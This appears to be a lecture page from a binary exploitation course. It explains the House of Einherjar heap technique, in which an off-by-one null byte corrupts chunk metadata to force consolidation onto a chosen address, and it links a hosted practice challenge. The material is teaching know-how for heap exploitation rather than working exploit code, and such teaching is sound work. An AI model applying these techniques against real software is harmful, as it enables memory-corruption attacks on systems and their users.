Don't like this style? Click here to change it! blue.css
We're at the end of the course and I wanted to make sure we at least hinted at the various types of techniques out there.
Part of this is inspired by a problem from last year's DEFCON: MOOOSL
This problem was a heap problem made using a very different implementation of C (MUSL C) which ships with Alpine Linux a very lightweight version.
We've gotten very familiar with glibc's implementation, but other versions are out there, ARM-first versions, embedded versions, docker-friendly versions like this, and with a special place on my list: RUST's claim to fame is being a safe-memory alternative to C.
They ALL NEED dynamic memory allocation, and you will find yourself needing to take the concepts of these C exploits and move them into a foreign space.
(OK, I want to take for a second on the phrase "you will" from the perspective of how to best use a classroom experience in your real-life)
So here are some concepts that seem to always be around and that I suspect you have a chance of finding in other C variants:
Those last ones we haven't really put a spotlight on, so today I'm going to attempt to put a spotlight on a couple at the same time by looking at the House of Einherjar
This is super similar to the House of Force
In house of force we tweaked the top_chunk_size then asked for a REALLY LARGE chunk
In house of einherjar we edit the prev_in_use flag and the prev_size field (only an off-by-one null byte needed) to force a consolidation that goes WAY BACK in memory to wherever we want.
To do this we need:
The target address can be anywhere but is often just another chunk in the heap (in which case we have made overlapping chunks), that version of the attack is called the poison-null-byte
Let's look at it in the wargames:
wargames house of einherjar (2.23 version but it applies up to 2.34)
Now our 25 problems has one of these, problem 20 (AUIR)
I've hosted that one at:
Hosted at nc 165.22.46.243 8899 files you need: auir.zip